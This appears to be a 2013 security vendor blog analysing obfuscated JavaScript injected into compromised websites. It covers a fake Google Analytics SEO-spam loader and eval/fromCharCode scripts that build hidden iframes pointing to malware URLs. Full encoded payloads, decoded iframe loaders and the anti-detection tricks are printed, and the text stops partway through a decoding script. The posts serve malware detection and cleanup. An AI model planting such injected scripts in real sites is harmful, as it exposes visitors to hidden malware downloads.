Sunday, March 31, 2013

Blackhat SEO Spam injection example

Blackhat SEO spam injected into a website, identified with the Online Website Scanner

No active malware was found on this website, and it might look completely normal when opened in a web browser. However, when we did a Google search for it we noticed that some pages had identical text in the search results preview, and that content had no relation to the topics this website was intended to cover, which are pictures, videos and notes about nature.

Here is the Google results snapshot:

Blackhat SEO Spam

Website Malware Scanner report

Sun Mar 31 18:10:13 2013
Infected website's files: N/A
Website malware scan report: http://goo.gl/XXTPr

As you can see, the engine identified 38 Potentially Suspicious files.



Let's take a look at the beautified Threat Dump:


<script type='text/javascript' language='javascript'>
    var _ga3 = [];
    _ga3.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);
    _ga3.push(['_setOption', '6918518510413211617918517317417116717017118411919318218']);
    _ga3.push(['_setPageId', '1185175186175181180128167168185181178187186171129169178']);
    _ga3.push(['_trackPageview', '1751821281841711691861101221251261821901141671871861811']);
    _ga3.push(['_trackPageview', '1416718718618111412212512618219011112919513011718518619']);
    _ga3.push(['_setOption', '1178171132']);
    var t = z = '', l = pos = v = 0, a1 = "arCo", a2 = "omCh";
    for (v = 0; v < _ga3.length; v++) t += _ga3[v][1]; l = t.length;
    // "fr" + a2 + a1 + "de" spells "fromCharCode"; every 3-digit chunk minus 70 is one character code
    while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);
    document.write(z);
</script>


This looks pointless as it decodes to:

<style type="text/css">.msgheader1{position:absolute;clip:rect(478px,auto,auto,478px);}</style>

We can't say for sure how this serves the blackhat SEO spamming purpose, but it is clearly not the original intent of the webmaster.
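The decoding loop above can be reproduced statically, without letting document.write run. The following Python script is an added example (not Quttera's code): it pulls the digit strings out of the _gaN.push() calls, reads the chunk width and the subtracted constant from the script itself, rebuilds the hidden text, and carries the heuristic the scanner flagged, a String[...] method name built by concatenation.

```python
import re

# Sample input: the injected script from this post, copied from the threat dump above.
GA_SCRIPT = """<script type='text/javascript' language='javascript'>
var _ga3 = []; _ga3.push(['_trackPageview', '1301851861911781711021861911821711311041861711901861171']);_ga3.push(['_setOption', '6918518510413211617918517317417116717017118411919318218']); _ga3.push(['_setPageId','1185175186175181180128167168185181178187186171129169178']); _ga3.push(['_trackPageview','1751821281841711691861101221251261821901141671871861811']); _ga3.push(['_trackPageview','1416718718618111412212512618219011112919513011718518619']); _ga3.push(['_setOption', '1178171132']);
var t = z = '', l = pos = v = 0, a1 = "arCo", a2 = "omCh";
for (v = 0; v < _ga3.length; v++) t += _ga3[v][1]; l = t.length;
while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);document.write(z);
</script>"""

# Every _gaN.push(['<fake GA method>', '<digits>']) carries one piece of the payload.
PUSH_RE = re.compile(r"_ga\d+\.push\(\[\s*'[^']*'\s*,\s*'(\d+)'\s*\]\)")
# The chunk width is the amount added to pos in t.slice(pos, pos += N).
CHUNK_RE = re.compile(r"slice\(\s*pos\s*,\s*pos\s*\+=\s*(\d+)\s*\)")
# The subtracted constant follows the parseInt(...) call: "...) - 70)".
OFFSET_RE = re.compile(r"\)\s*-\s*(\d+)\s*\)")
# What the scanner objected to: a String method name assembled from pieces
# (String["fr" + ...]) instead of a plain String.fromCharCode call.
DYNAMIC_METHOD_RE = re.compile(r'String\s*\[\s*"[^"]*"\s*\+')


def extract_digit_payload(script):
    """Concatenate the digit strings in the order the script pushes them."""
    return "".join(PUSH_RE.findall(script))


def decode_ga_payload(script):
    """Rebuild the text the script would document.write(), without running it."""
    digits = extract_digit_payload(script)
    chunk = int(CHUNK_RE.search(script).group(1))    # 3 on this page
    offset = int(OFFSET_RE.search(script).group(1))  # 70 on this page
    out = []
    for i in range(0, len(digits), chunk):
        code = int(digits[i:i + chunk]) - offset
        # String.fromCharCode truncates to 16 bits, so a short trailing chunk
        # (negative result) becomes the same garbage character JS would emit.
        out.append(chr(code & 0xFFFF))
    return "".join(out)


def has_dynamic_string_method(script):
    """Cheap triage check: does the script build a String method name at runtime?"""
    return DYNAMIC_METHOD_RE.search(script) is not None
```

Running decode_ga_payload over the script yields exactly the <style> block quoted above, which is how the "pointless" CSS was recovered.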

Now let's take a look at the links. We won't place an image of all 174 links that were detected by the malware scanner; we only show those that are clearly injected and that redirect to websites selling Viagra.

We may now assume that the website was attacked and that the placed links are raising the search-engine page rank of the sites they point to. The Potentially Suspicious JavaScript above might be used to track these links, as it looks like malicious Google Analytics (GA) code.

Removing the spam


In the case of this website it looks like a malicious WordPress plugin, but a manual check is required to say for sure. In the case of shared hosting the infected files might not be on the attacked website, or at least not all of them. If you suspect your site has been compromised in this way, sign up for Website Anti-malware Monitoring and receive a malware remediation assessment for these and other kinds of malware.


Saturday, March 30, 2013

Thursday, March 28, 2013

Malicious hidden iframe downloads content from suspicious website


Obfuscated JavaScript code generates iframe to load content from suspicious website

Background


The Online Website Malware Scanner detected a malicious JavaScript code injection. This sort of malicious obfuscated JavaScript code is used to build a malicious iframe that is not visible to the website user and finally brings content from a remote malware distributor. In the case of this website the suspicious JavaScript code is injected in 24 files. As discussed in other posts about malicious iframe generation, the flow is very similar and contains multiple levels of obfuscation to overcome detection mechanisms.


Malicious action


Malicious iframes are usually utilized to distribute malware from external web resources (websites).


Detection details


Submission date: Thu Mar 28 08:14:34 2013
Infected website pages: 24
Website malware scan report: http://goo.gl/rsXvJ
Snapshot from Quttera's online Website Malware Scanner

Threat dump:
[[                                                                                                                                                                                                                                                          asq=function(){return n[i];};ww=window;ss=String["fro"+"mC"+"harC"+"o"+"de"];try{document.body=~1}catch(dgsgsdg){zz=12*2+1+1;whwej=12;}if(whwej){try{}catch(agdsg){whwej=0;}try{document.body--;}catch(bawetawe){if(ww.document){n="0x29,0x67,0x76,0x6f,0x64,0x75,0x6a,0x70,0x6f,0x21,0x29,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x77,0x62,0x73,0x21,0x72,0x6a,0x7b,0x7b,0x21,0x3e,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x64,0x73,0x66,0x62,0x75,0x66,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x29,0x28,0x6a,0x67,0x73,0x62,0x6e,0x66,0x28,0x2a,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x73,0x64,0x21,0x3e,0x21,0x28,0x69,0x75,0x75,0x71,0x3b,0x30,0x30,0x74,0x76,0x71,0x66,0x73,0x77,0x70,0x6d,0x75,0x2f,0x6a,0x66,0x30,0x64,0x70,0x6d,0x6a,0x6f,0x30,0x64,0x6d,0x6c,0x2f,0x71,0x69,0x71,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x71,0x70,0x74,0x6a,0x75,0x6a,0x70,0x6f,0x21,0x3e,0x21,0x28,0x62,0x63,0x74,0x70,0x6d,0x76,0x75,0x66,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x63,0x70,0x73,0x65,0x66,0x73,0x21,0x3e,0x21,0x28,0x31,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x69,0x66,0x6a,0x68,0x69,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x78,0x6a,0x65,0x75,0x69,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x6d,0x66,0x67,0x75,0x21,0x3e,0x21,0x28,0x32,0x71,0x79,0x28,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x72,0x6a,0x7b,0x7b,0x2f,0x74,0x75,0x7a,0x6d,0x66,0x2f,0x75,0x70,0x71,0x21,0x3e,0x21,0x28,0x32,0x71,0x7
9,0x28,0x3c,0xe,0xb,0xe,0xb,0x21,0x21,0x21,0x21,0x6a,0x67,0x21,0x29,0x22,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2a,0x21,0x7c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x78,0x73,0x6a,0x75,0x66,0x29,0x28,0x3d,0x65,0x6a,0x77,0x21,0x6a,0x65,0x3e,0x5d,0x28,0x72,0x6a,0x7b,0x7b,0x5d,0x28,0x3f,0x3d,0x30,0x65,0x6a,0x77,0x3f,0x28,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x21,0x65,0x70,0x64,0x76,0x6e,0x66,0x6f,0x75,0x2f,0x68,0x66,0x75,0x46,0x6d,0x66,0x6e,0x66,0x6f,0x75,0x43,0x7a,0x4a,0x65,0x29,0x28,0x72,0x6a,0x7b,0x7b,0x28,0x2a,0x2f,0x62,0x71,0x71,0x66,0x6f,0x65,0x44,0x69,0x6a,0x6d,0x65,0x29,0x72,0x6a,0x7b,0x7b,0x2a,0x3c,0xe,0xb,0x21,0x21,0x21,0x21,0x7e,0xe,0xb,0x7e,0x2a,0x29,0x2a,0x3c".split(",");h=2;s="";if(whwej){for(i=0;i-483!=0;i++){k=i;s=s.concat(ss(eval(asq())-1));}z=s;ww["eval"](""+s);}}}}]]

Wednesday, March 27, 2013

Suspicious obfuscated JavaScript generates iframe to Blacklisted website

Obfuscated JavaScript generates iframe to Blacklisted website

This sort of suspicious obfuscated JavaScript code is used to build a malicious iframe that is not visible to the website visitor but is identified by the Online Website Malware Scanner. In the case of this website the suspicious JavaScript code is injected in 59 files. Multiple redundant "if" statements and levels of obfuscation are used to bypass detection mechanisms before the final call to eval() that evaluates the malicious action. The invocation of eval() is also passed through several variables to make it harder to identify. Malicious iframes are usually utilized to distribute malware from external web resources (websites).

Full website malware scan report: http://goo.gl/pIjYY
Submission date: Tue Mar 26 18:47:55 2013
Snapshot from Quttera's online Website Malware Scanner:


Threat dump:
[[ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eva"+"l";if(document)try{document.body=12;}catch(gdsgsdg){vzs=0;try{document;}catch(q){vzs=1;}}if(!vzs)e=window[v];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0153,0170,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0153,0170,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0160,0145,0162,0163,0157,0156,0141,0154,055,0146,0151,0164,0156,0145,0163,0163,055,0142,0154,0157,0147,056,0144,0145,057,0143,0154,0151,0143,0153,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0153,0170,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0170,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,01
53,0170,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0153,0170,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0153,0170,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+473!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(window.document)if(v)xz(s)}]]

Beautified script

ff = String;
fff = "fromCharCode";
ff = ff[fff];                  // ff is now String.fromCharCode
zz = 3;
try {
    document.body % 26 = 5151  // "%26" is a URL-encoded "&" left by the dump; the statement is most likely document.body &= 5151, which throws
} catch (gdsgd) {
    v = "eva" + "l";
    if (document) try {
        document.body = 12;    // also throws, so execution continues in the catch block
    } catch (gdsgsdg) {
        vzs = 0;
        try {
            document;
        } catch (q) {
            vzs = 1;
        }
    }
    if (!vzs) e = window[v];   // e is window["eval"]
    if (1) {
        f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0153, 0170, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0160, 0145, 0162, 0163, 0157, 0156, 0141, 0154, 055, 0146, 0151, 0164, 0156, 0145, 0163, 0163, 055, 0142, 0154, 0157, 0147, 056, 0144, 0145, 057, 0143, 0154, 0151, 0143, 0153, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0153, 0170, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0153, 0170, 047, 051, 051, 040, 0173, 015, 012, 
040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0153, 0170, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0153, 0170, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0153, 0170, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
    }
    w = f;
    s = [];
    if (window.document) for (i = 2 - 2; - i + 473 != 0; i += 1) {
        j = i;
        if ((031 == 0x19)) if (e) s = s + ff(w[j]); // s = s + String.fromCharCode(w[j])
    }
    xz = e;
    if (window.document) if (v) xz(s) // eval(s)
}

Simplified version of detected web threat

     f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 01
     w = f;
     s = [];
     for (i = 2 - 2; - i + 473 != 0; i += 1) {
         s = s + String.fromCharCode(w[i]);
     }
     s = s.replace(/&/g,"&amp;");
     s = s.replace(/</g,"&lt;");
     s = s.replace(/>/g,"&gt;");
     document.write("<pre><code>" +  s + "</code></pre>");

Detected payload

(function () {
    var kx = document.createElement('iframe');

    kx.src = 'http://www.personal-fitness-blog[.]de/clicker[.]php';
    kx.style.position = 'absolute';
    kx.style.border = '0';
    kx.style.height = '1px';
    kx.style.width = '1px';
    kx.style.left = '1px';
    kx.style.top = '1px';

    if (!document.getElementById('kx')) {
        document.write('<div id=\'kx\'></div>');
        document.getElementById('kx').appendChild(kx);
    }
})();

URL targeted by generated iframe 

There were actually several URLs and they changed each time to a new one. Here are some that we detected:

  1. http://www.personal-fitness-blog[.]de/clicker[.]php
  2. http://prolocomilazzo[.]it/dtd[.]php



Blacklisting status

Yandex via Sophos: http://www.yandex.com/infected?url=personal-fitness-blog.de&l10n=en

Snapshot:


Malware clean-up

Such malware is often hidden inside a JavaScript file. If you were infected by similar malware, please use one of the accounts here for a remediation assessment.

Tuesday, March 26, 2013

Malicious WordPress plugin using dynamic "fromCharCode" method

Malicious WordPress plugin

The Online Website Malware Scanner detected a similar malicious JavaScript script in a WordPress plugin. We have already encountered similar patterns on other websites.

Full website malware scan report: http://quttera.com/detailed_report/www.afwake.com
Submission date: Mon Mar 25 20:30:03 2013
Quttera website scan report snapshot:




The malicious JavaScript with dynamic "fromCharCode"

<script type='text/javascript' language='javascript'>
    var _ga7 = [];
    _ga7.push(['_setOption', '1301851861911781711021861911821711311041861711901861171']);
    _ga7.push(['_setOption', '6918518510413211616916718518716717816517619318218118517']);
    _ga7.push(['_trackPageview', '5186175181180128167168185181178187186171129169178175182']);
    _ga7.push(['_setPageId', '1281841711691861101221211221821901141671871861811141671']);
    _ga7.push(['_setOption', '8718618111412212112218219011112919513011718518619117817']);
    _ga7.push(['_setOption', '1132']);
    var t = z = '',
        l = pos = v = 0,
        a1 = "arCo",
        a2 = "omCh";
    for (v = 0; v < _ga7.length; v++) t += _ga7[v][1];
    l = t.length;
    while (pos < l) z += String["fr" + a2 + a1 + "de"](parseInt(t.slice(pos, pos += 3)) - 70);
    document.write(z);
</script>

Related post

A similar case with a malicious Google Analytics plugin is discussed here: http://quttera.blogspot.co.il/2013/03/malicious-wordpress-plugin-detection.html

Monday, March 25, 2013

Obfuscated JavaScript to load hidden iframe with malicious redirection

Obfuscated JavaScript used to load hidden iframe with malicious link

This sort of malicious redirection using obfuscated execution of eval has been detected by the Website malware scanner. In this case the script contained lots of redundant "if" statements to bypass detection mechanisms. The invocation of eval is passed through several variables to mask it from malware detection engines.

Full website malware scan report: http://goo.gl/JhYp5
Submission date: Sun Mar 24 16:27:53 2013
Threat dump:
[[                                                                                                                                                                                                                                                          ff=String;fff="fromCharCode";ff=ff[fff];zz=3;try{document.body%26=5151}catch(gdsgd){v="eval";if(document)try{document.body=12;}catch(gdsgsdg){asd=0;try{}catch(q){asd=1;}if(!asd){w={a:window}.a;vv=v;}}e=w[vv];if(1){f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,0173,015,012,040,040,040,040,0166,0141,0162,040,0157,0165,040,075,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0143,0162,0145,0141,0164,0145,0105,0154,0145,0155,0145,0156,0164,050,047,0151,0146,0162,0141,0155,0145,047,051,073,015,012,015,012,040,040,040,040,0157,0165,056,0163,0162,0143,040,075,040,047,0150,0164,0164,0160,072,057,057,0167,0167,0167,056,0163,0165,0172,0165,0153,0151,0147,0163,0162,066,060,060,056,0156,0145,0164,0141,0165,056,0156,0145,0164,057,0143,0157,0165,0156,0164,0145,0162,056,0160,0150,0160,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0160,0157,0163,0151,0164,0151,0157,0156,040,075,040,047,0141,0142,0163,0157,0154,0165,0164,0145,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0142,0157,0162,0144,0145,0162,040,075,040,047,060,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0150,0145,0151,0147,0150,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0167,0151,0144,0164,0150,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0154,0145,0146,0164,040,075,040,047,061,0160,0170,047,073,015,012,040,040,040,040,0157,0165,056,0163,0164,0171,0154,0145,056,0164,0157,0160,040,075,040,047,061,0160,0170,047,073,015,012,015,012,040,040,040,040,0151,0146,040,050,041,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,
0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,051,040,0173,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0167,0162,0151,0164,0145,050,047,074,0144,0151,0166,040,0151,0144,075,0134,047,0157,0165,0134,047,076,074,057,0144,0151,0166,076,047,051,073,015,012,040,040,040,040,040,040,040,040,0144,0157,0143,0165,0155,0145,0156,0164,056,0147,0145,0164,0105,0154,0145,0155,0145,0156,0164,0102,0171,0111,0144,050,047,0157,0165,047,051,056,0141,0160,0160,0145,0156,0144,0103,0150,0151,0154,0144,050,0157,0165,051,073,015,012,040,040,040,040,0175,015,012,0175,051,050,051,073);}w=f;s=[];if(window.document)for(i=2-2;-i+471!=0;i+=1){j=i;if((031==0x19))if(e)s=s+ff(w[j]);}xz=e;if(v)xz(s)}]]

Snapshot from Quttera's Online Malware Scanner:
The beautified script 

ff = String;
fff = "fromCharCode";
ff = ff[fff];
zz = 3;
try {
    document.body % 26 = 5151
} catch (gdsgd) {
    v = "eval";
    if (document) try {
        document.body = 12;
    } catch (gdsgsdg) {
        asd = 0;
        try {} catch (q) {
            asd = 1;
        }
        if (!asd) {
            w = {
                a: window
            }.a;
            vv = v;
        }
    }
    e = w[vv];
    if (1) {
         f = new Array(050, 0146, 0165, 0156, 0143, 0164, 0151, 0157, 0156, 040, 050, 051, 040, 0173, 015, 012, 040, 040, 040, 040, 0166, 0141, 0162, 040, 0157, 0165, 040, 075, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0143, 0162, 0145, 0141, 0164, 0145, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 050, 047, 0151, 0146, 0162, 0141, 0155, 0145, 047, 051, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0162, 0143, 040, 075, 040, 047, 0150, 0164, 0164, 0160, 072, 057, 057, 0167, 0167, 0167, 056, 0163, 0165, 0172, 0165, 0153, 0151, 0147, 0163, 0162, 066, 060, 060, 056, 0156, 0145, 0164, 0141, 0165, 056, 0156, 0145, 0164, 057, 0143, 0157, 0165, 0156, 0164, 0145, 0162, 056, 0160, 0150, 0160, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0160, 0157, 0163, 0151, 0164, 0151, 0157, 0156, 040, 075, 040, 047, 0141, 0142, 0163, 0157, 0154, 0165, 0164, 0145, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0142, 0157, 0162, 0144, 0145, 0162, 040, 075, 040, 047, 060, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0150, 0145, 0151, 0147, 0150, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0167, 0151, 0144, 0164, 0150, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0154, 0145, 0146, 0164, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 040, 040, 040, 040, 0157, 0165, 056, 0163, 0164, 0171, 0154, 0145, 056, 0164, 0157, 0160, 040, 075, 040, 047, 061, 0160, 0170, 047, 073, 015, 012, 015, 012, 040, 040, 040, 040, 0151, 0146, 040, 050, 041, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 051, 040, 0173, 015, 012, 040, 040, 040, 
040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0167, 0162, 0151, 0164, 0145, 050, 047, 074, 0144, 0151, 0166, 040, 0151, 0144, 075, 0134, 047, 0157, 0165, 0134, 047, 076, 074, 057, 0144, 0151, 0166, 076, 047, 051, 073, 015, 012, 040, 040, 040, 040, 040, 040, 040, 040, 0144, 0157, 0143, 0165, 0155, 0145, 0156, 0164, 056, 0147, 0145, 0164, 0105, 0154, 0145, 0155, 0145, 0156, 0164, 0102, 0171, 0111, 0144, 050, 047, 0157, 0165, 047, 051, 056, 0141, 0160, 0160, 0145, 0156, 0144, 0103, 0150, 0151, 0154, 0144, 050, 0157, 0165, 051, 073, 015, 012, 040, 040, 040, 040, 0175, 015, 012, 0175, 051, 050, 051, 073);
    }
    w = f;
    s = [];
    if (window.document) for (i = 2 - 2; - i + 471 != 0; i += 1) {
        j = i;
        if ((031 == 0x19)) if (e) s = s + ff(w[j]);
    }
    xz = e;
    if (v) xz(s)
}

The obfuscation flow

  1. ff = String;
     fff = "fromCharCode";
     ff = ff[fff];
     /* ff is a pointer to String's method fromCharCode, hence ff is String.fromCharCode */
  2. try { document.body % 26 = 5151
     /* document.body is an object, so a numeric operation on it raises an exception and the following "catch" block is executed */
     } catch (gdsgd) { v = "eval";
     /* v holds the string "eval"; calling w[v]("javascript code") later is identical to eval("javascript code") */
  3. if (document) try {
         document.body = 12;
         /* the same trick as before: this instruction raises an exception */
     } catch (gdsgsdg) {
         asd = 0;
         try {} catch (q) {
             /* the try block is empty, so the catch block is skipped and asd remains zero */
             asd = 1;
         }
  4.     if (!asd) {
             /* since asd is zero this block is executed; the following trick is identical to "w = window" */
             w = { a: window }.a;
             vv = v;  /* vv = "eval" */
         }
     }
     /* w equals window and vv equals "eval", so this instruction is identical to e = window["eval"] */
     e = w[vv];
     if (1) {
     /* 1 is true, so the execution flow enters this if block */
  5. if (window.document) {
     /* window.document is an object, so it is always true and the execution flow enters this block */
         for (i = 2 - 2; - i + 471 != 0; i += 1) {
             j = i;
             if ((031 == 0x19)) {
             /* this is a comparison of the same value represented in octal and hexadecimal formats */
                 if (e) {
                 /* e points to the function eval, so it is true and execution enters here */
                     s = s + ff(w[j]);
                     /* this equals s = s + String.fromCharCode(w[j]) */
     } } } }
  6. xz = e;
     /* xz now points to the eval method */
     if (v) {
     /* v holds "eval", so it is "true" and thus eval(s) is executed */
         xz(s)
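Both the simplified version shown in the March 27 post and the flow above reduce to "numeric array, optional subtraction, fromCharCode, eval". The Python script below is an added example, not code from this blog or from Quttera, that performs that decoding offline: it handles the legacy-octal new Array(...) form and the hex "...".split(",") form with the -1 offset from the March 28 post, and takes the subtracted constant from the script text. The two snippets are constructed from the first values of the arrays on this page, cut short to keep the example readable.

```python
import re

# Constructed samples: the opening values of the two numeric arrays on this page,
# cut short so the example stays readable. The octal one is the "new Array(...)"
# form, the hex one the "...".split(",") form with a -1 offset. Both decode to
# the start of the iframe loader shown in the "Detected payload" section.
OCTAL_SNIPPET = (
    "f=new Array(050,0146,0165,0156,0143,0164,0151,0157,0156,040,050,051,040,"
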